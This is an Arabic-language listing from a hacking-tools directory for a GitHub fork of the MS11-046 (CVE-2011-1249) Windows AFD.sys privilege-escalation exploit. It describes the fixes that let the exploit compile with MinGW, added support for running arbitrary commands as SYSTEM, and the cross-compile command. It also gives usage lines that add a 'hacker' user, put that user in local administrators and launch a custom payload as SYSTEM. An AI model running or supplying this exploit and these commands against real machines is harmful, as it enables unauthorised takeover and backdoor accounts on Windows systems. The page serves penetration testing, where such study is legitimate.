Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
edb-40564-mingw-fix — CVE-2011-1249 (MS11-046) تصعيد امتيازات AFD — إصلاح التجميع المتقاطع لـMinGW + دعم الأوامر المخصصة | Kitploit
أدوات/GitHubGitHub/appl3b0y/edb-40564-mingw-fix
تصعيد الامتيازاتتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقاستغلال الملفات الثنائية
GitHubappl3b0y/edb-40564-mingw-fix

edb-40564-mingw-fix

CVE-2011-1249 (MS11-046) تصعيد امتيازات AFD — إصلاح التجميع المتقاطع لـMinGW + دعم الأوامر المخصصة

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ms11-046-mingw

CVE-2011-1249 / MS11-046 — تصعيد الامتيازات لـ AFD.sys لنظام Windows x86.

الاستغلال الأصلي بواسطة Tomislav Paskalev (EDB-40564). هذا الفرع يصلح أخطاء الترجمة المتقاطعة لـ MinGW ويضيف تنفيذ أوامر مخصصة عبر argv[1].


التغييرات عن الأصل

#التغييرالسبب
1FARPROC ZwQuerySystemInformation ← مؤشر دالة مكتوب (pZwQuerySystemInformation)فحص النوع الصارم في MinGW يرفض استدعاء FARPROC ذو صفر معاملات مع وسائط — تفشل الترجمة مع too many arguments to function
2تم تعليم المصفوفات securityPatches[] على أنها staticالمصفوفات المعلنة داخل كتل if/else يتم تخصيصها في المكدس وتخرج من النطاق؛ بدون static تصبح المؤشرات معلقة
3أمر مخصص عبر argv[1]تشغيل أي أمر كـ SYSTEM بدلاً من cmd.exe الثابت

المشكلة

تجميع الاستغلال الأصلي باستخدام MinGW يفشل:

root@kitploit:~
ms11-046.c: error: too many arguments to function 'ZwQuerySystemInformation'; expected 0, have 4

FARPROC هو مؤشر دالة عام معلن بعدد صفر من المعاملات. يفرض MinGW فحص نوع صارم ويرفض استدعاءه مع وسائط. الإصلاح هو مؤشر دالة مكتوب بالتوقيع الصحيح.

توجد ثنائيات مسبقة التجميع (مثل SecWiki/windows-kernel-exploits) ولكنها لا تدعم الأوامر المخصصة.


الترجمة المتقاطعة على لينكس (MinGW)

root@kitploit:~
sudo apt install mingw-w64
i686-w64-mingw32-gcc ms11-046.c -o ms11-046.exe -lws2_32

الاستخدام

root@kitploit:~
ms11-046.exe                                             # default: spawns cmd.exe as SYSTEM
ms11-046.exe "net user hacker Pass123! /add"             # add a user as SYSTEM
ms11-046.exe "net localgroup administrators hacker /add" # add to local admins
ms11-046.exe "c:\windows\temp\shell.exe"                 # run a custom payload as SYSTEM

المراجع

  • MS11-046 — نشرة الأمان من Microsoft
  • CVE-2011-1249 - قاعدة بيانات الثغرات الوطنية
  • EDB-40564 — الاستغلال الأصلي
تنزيل الأداة